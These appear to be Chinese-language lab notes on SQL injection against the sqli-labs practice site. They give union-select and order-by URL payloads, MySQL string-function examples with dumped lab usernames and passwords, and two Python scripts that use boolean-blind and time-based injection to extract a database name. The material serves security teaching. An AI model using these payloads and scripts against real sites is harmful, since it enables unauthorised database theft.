联合注入关键在于确定数据库查询结果的列数,查询结果的列数,可以使用 使用 union select 或 order by 语句探测查询结果的字段。
使用 union select 语句爆破,payload 如下
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' union select 1--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' union select 1,2--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' union select 1,2,3--+
使用 order by 指数(order by数字以2的n次方指数增加) 和 二分法爆破,payload 如下
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 1--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 2--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 4--+
http://192.168.154.135/sqli-labs-php7/Less-1/?id=1' order by 8--+
联合注入常用函数
联合注入常使用如下字符串拼接函数
内置函数
描述
举例
concat(str1, str2, ...)
拼接字符串
concat("1", "2", "3") --> "123"
concat_ws(separator, str1, str2, ..)
拼接字符串,各个字符之间插入separator
concat("/", "1", "2", "3") --> "1/2/3"
group_concat(column_name)
将查询结果用,拼接成一个字符串
select group_concat(username) from users; --> "user1,user2,user3 .."
样例
mysql> select concat("123", 456);
+--------------------+
| concat("123", 456) |
+--------------------+
| 123456 |
+--------------------+
1 row in set (0.00 sec)
mysql> select concat("123", "456");
+----------------------+
| concat("123", "456") |
+----------------------+
| 123456 |
+----------------------+
1 row in set (0.00 sec)
mysql> select concat_ws("/","123", "456");
+-----------------------------+
| concat_ws("/","123", "456") |
+-----------------------------+
| 123/456 |
+-----------------------------+
1 row in set (0.00 sec)
mysql> select group_concat(username) from users;
+---------------------------------------------------------------------------------------------+
| group_concat(username) |
+---------------------------------------------------------------------------------------------+
| Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4 |
+---------------------------------------------------------------------------------------------+
1 row in set (0.00 sec)
mysql> select length("123");
+---------------+
| length("123") |
+---------------+
| 3 |
+---------------+
1 row in set (0.00 sec)
mysql> select ascii('0');
+------------+
| ascii('0') |
+------------+
| 48 |
+------------+
1 row in set (0.01 sec)
mysql> select substr("12345", 2, 3);
+-----------------------+
| substr("12345", 2, 3) |
+-----------------------+
| 234 |
+-----------------------+
1 row in set (0.00 sec)
mysql> select count(username) from security.users;
+-----------------+
| count(username) |
+-----------------+
| 13 |
+-----------------+
1 row in set (0.01 sec)
mysql> select * from security.users limit 0,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | Dumb | Dumb |
+----+----------+----------+
1 row in set (0.00 sec)
mysql> select * from security.users limit 3;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
+----+----------+------------+
3 rows in set (0.00 sec)
布尔盲注示例
当返回的页面包含 "You are in" 字符串时为 true,否则为false
布尔盲注获取数据库名思路:
获取数据库名的长度,遍历或用二分法爆破http://192.168.154.135/sqli-labs-php7/Less-8/?id=1' and length(database())=n--+种的n,当返回 true 的时候得到数据库的长度
使用ascii、substr、database函数,利用二分法爆破数据库名称,如 http://192.168.154.135/sqli-labs-php7/Less-8/?id=1' and ascii(substr(database(), i, 1))=n--+ 种的第 i 个字符对应的 ascii 码为 n,那么对应的字符为 chr(n)
利用 python 脚本爆破数据库名如下:
import requests
url = "http://192.168.154.135/sqli-labs-php7/Less-8/"
def get_dblen(url):
para = "?id=1' and length(database())=%d--+"
url = url + para
for i in range(20):
rsp = requests.get(url % (i,))
if "You are in" in rsp.content.decode("utf-8"):
return i
def get_dbname(url):
dblen = get_dblen(url)
para = "?id=1' and ascii(substr(database(), %d, 1))<%d--+"
url = url + para
dbname = []
for i in range(1, dblen + 1):
left = 0
right = 256
while True:
if left == right or left == (right - 1):
dbname.append(chr(left))
break
rsp = requests.get(url % (i, (left + right) / 2))
if "You are in" not in rsp.content.decode("utf-8"):
left = int((left + right) / 2)
else:
right = int((left + right) / 2)
return "".join(dbname)
if __name__ == "__main__":
print(get_dbname(url))
import requests
url = "http://192.168.154.135/sqli-labs-php7/Less-9/"
def get_dblen(url):
para = "?id=1' and if(length(database())=%d, sleep(0.1), null)--+"
url = url + para
rsp = requests.get(url % (8,))
for i in range(20):
rsp = requests.get(url % (i,))
if rsp.elapsed.total_seconds() >= 0.1:
return i
def get_dbname(url):
dblen = get_dblen(url)
para = "?id=1' and if(ascii(substr(database(), %d, 1))<%d, sleep(0.1), null)--+"
url = url + para
dbname = []
for i in range(1, dblen + 1):
left = 0
right = 256
while True:
if left == right or left == (right - 1):
dbname.append(chr(left))
break
rsp = requests.get(url % (i, (left + right) / 2))
if rsp.elapsed.total_seconds() < 0.1:
left = int((left + right) / 2)
else:
right = int((left + right) / 2)
return "".join(dbname)
if __name__ == "__main__":
print(get_dbname(url))